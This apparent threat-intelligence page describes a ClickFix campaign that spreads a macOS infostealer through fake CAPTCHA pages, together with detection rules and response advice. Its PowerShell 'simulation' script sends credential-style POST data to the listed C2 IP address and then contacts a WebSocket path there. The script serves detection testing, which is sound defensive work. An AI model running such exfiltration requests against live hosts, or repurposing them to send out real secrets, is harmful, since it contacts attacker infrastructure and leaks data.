SOC Prime Bias: High

28 Sep 2026 14:47 UTC

Macfinger ClickFix Campaign: Analyzing the Malware

Author Photo
SOC Prime Team linkedin icon Follow
Macfinger ClickFix Campaign: Analyzing the Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The Macfinger ClickFix campaign delivers an unidentified macOS information stealer through fake CAPTCHA verification pages. The attack uses shell scripts to retrieve architecture-specific Mach-O binaries for either Intel or Apple Silicon systems. Once launched, the malware requests broad system permissions and exfiltrates sensitive information through HTTP POST requests and WebSocket-based communication.

Investigation

The investigation focused on an infection observed on a macOS 27.0 host. Analysts traced the initial shell script loader, the subsequent retrieval of Mach-O binaries, and the malware’s command-and-control communication patterns. The research also differentiated the threat from the previously documented AMOS Stealer based on differences in persistence, data collection, and exfiltration behavior.

Mitigation

Users should avoid interacting with suspicious browser-based CAPTCHA prompts or executing unexpected terminal commands provided by websites. Organizations should monitor for unauthorized changes to LaunchAgents and suspicious downloads written to the /Library/Caches directory. Limiting administrative privileges can also reduce the malware’s ability to obtain the system-wide permissions required for execution.

Response

When Macfinger-related activity is detected, isolate the affected macOS endpoint from the network to prevent further data exfiltration. Perform forensic analysis of the /Library/LaunchAgents/ and /Library/Caches/ directories to identify persistence artifacts. Review system logs for unauthorized permission requests and access to sensitive locations such as Documents, Desktop, and Downloads.

Attack Flow

Detections

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
28 Sep 2026

Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)

SOC Prime Team
25 Sep 2026

Suspicious Curl Execution Attempt [MacOS] (via cmdline)

SOC Prime Team
25 Sep 2026

IOCs (HashSha256) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign

SOC Prime AI Rules
25 Sep 2026

IOCs (SourceIP) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign

SOC Prime AI Rules
25 Sep 2026

IOCs (DestinationIP) to detect: A Closer Look at Malware From the Macfinger ClickFix Campaign

SOC Prime AI Rules
25 Sep 2026

Detect Macfinger ClickFix C2 Traffic and Data Exfiltration [HTTP Traffic]

SOC Prime AI Rules
25 Sep 2026

Detection of Macfinger ClickFix Campaign Infection [macOS Process Creation]

SOC Prime AI Rules
25 Sep 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary has successfully gained initial access and is attempting to exfiltrate harvested credentials. To avoid detection by standard web filters, they use a custom Go-based agent. The agent is programmed to send a POST request containing user credentials to the C2 endpoint /api/credentials. Following this, it establishes a WebSocket connection to /api/t to receive further instructions. The simulation will use PowerShell to spoof these specific HTTP characteristics (IP, User-Agent, and URI) to trigger the detection rule.

  • Regression Test Script:

    # Simulation of Macfinger C2 Traffic
    $C2_IP = "95.163.153.80"
    $UserAgent = "Go-http-client/1.1"
    
    Write-Host "[+] Starting Macfinger Simulation..." -ForegroundColor Cyan
    
    # 1. Simulate Data Exfiltration via HTTP POST
    Write-Host "[+] Attempting Data Exfiltration (POST /api/credentials)..." -ForegroundColor Yellow
    try {
        $exfilParams = @{
            Uri         = "http://$($C2_IP)/api/credentials"
            Method      = "POST"
            UserAgent   = $UserAgent
            Body        = "user=admin&pass=P@ssword123"
            ContentType = "application/x-www-form-urlencoded"
        }
        Invoke-RestMethod @exfilParams
    } catch {
        Write-Host "[-] Request failed (Expected if IP is not reachable): $($_.Exception.Message)" -ForegroundColor Gray
    }
    
    # 2. Simulate Command & Control via WebSocket (Simulated via HTTP GET to the specific URI)
    # Note: True WebSocket handshakes require specific libraries, but for network telemetry, 
    # the initial GET request to the URI is the primary trigger.
    Write-Host "[+] Attempting WebSocket Handshake (GET /api/t)..." -ForegroundColor Yellow
    try {
        $wsParams = @{
            Uri         = "http://$($C2_IP)/api/t"
            Method      = "GET"
            UserAgent   = $UserAgent
        }
        Invoke-RestMethod @wsParams
    } catch {
        Write-Host "[-] Request failed (Expected if IP is not reachable): $($_.Exception.Message)" -ForegroundColor Gray
    }
    
    Write-Host "[+] Simulation Complete." -ForegroundColor Cyan
  • Cleanup Commands:

    # No persistent artifacts are created by this simulation script.
    # Ensure no active connections to the target IP remain.
    Get-NetTCPConnection -RemoteAddress 95.163.153.80 -ErrorAction SilentlyContinue | Remove-NetTCPConnection -Confirm:$false